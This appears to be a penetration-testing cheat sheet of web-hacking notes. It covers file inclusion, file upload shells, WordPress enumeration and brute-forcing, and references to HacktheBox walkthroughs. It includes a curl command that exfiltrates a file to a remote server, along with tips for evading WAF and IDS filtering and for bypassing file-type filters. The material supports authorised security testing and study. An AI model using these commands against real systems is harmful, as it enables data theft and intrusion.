Web Notes
TODO: Need to pull web notes out of the OS Agnostic section (and then rename that to something better!)
Hack Responsibly.
Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
Checklist
HTTP Response Codes
Headers
HTTP Authorization headers
HTTP Security Headers
Header Bypass Methods
Cookies
"Largest Database of Pre-Categorized Cookies"
Scans a website for cookie usage
JavaScript
Ruby
Python2
Edit cookies in chrome
Settings -> Advanced Settings -> Privacy -> Content -> Cookies
or "Edit This Cookie" plugin
Edit cookies in firefox
Preferences -> Privacy -> Show Cookies
or "Cookies Manager+" addon
Local File Inclusion (LFI) / Remote File Inclusion (RFI)
Common and/or useful files to check for when exploiting Local File Inclusion (for both Linux and Windows): https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI
LFI - Retrieve HTML/PHP files without executing
File Upload
HTTP PUT
Cadaver
JPG to PNG shell
Upload Files through POST
OpenVAS Vulnerability Scanner
Misc
IPv6
primer: Ippsec:HacktheBox - Sneaky
ip6tables - iptables for ipv6
HTTP Authentication Types
XPATH Dump
whatismybrowser.com - research User-Agent strings
Use curl to exfiltrate file on remote server (from attackers box): curl -d @/<file> <remote server>
in order to proxy tools that have no proxy option: create burn proxy 127.0.0.1:80 Ippsec:HacktheBox - Granny & Grandpa
vulnerability testing for webdav (or other file upload vulns!): davtest
bypassing filetype filters with http MOVE command to rename allowed filetype Ippsec:HacktheBox - Granny & Grandpa
Wordpress enumeration: wpscan -u <url> [--disable-tls-checks]
pull Google cached webpage if regular site not loading: cache:https://<somewebsite>
Virtual Host Routing: substitute IP for hostname to get different results
hydra against http wordpress login walkthrough: IppSec:HacktheBox - Apocalyst
web application fuzzer: wfuzz
Web site "flyover" surveillance: Aquatone "is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface" - from the author (see link). Visual dirbuster?
Crawl web pages for keywords - useful for password/vhost enumeration lists
Common checks
IP conversion
Injecting IPs when '.' is disallowed: convert the standard "dotted decimal" format to decimal, or hex value using -ip2dh. The sending or receiving computer will usually automatically convert it to a format that it can use. This is a great way to bypass WAF, IDS, or other tools that filter on IPs.
If you like this content and would like to see more, please consider buying me a coffee!
Last updated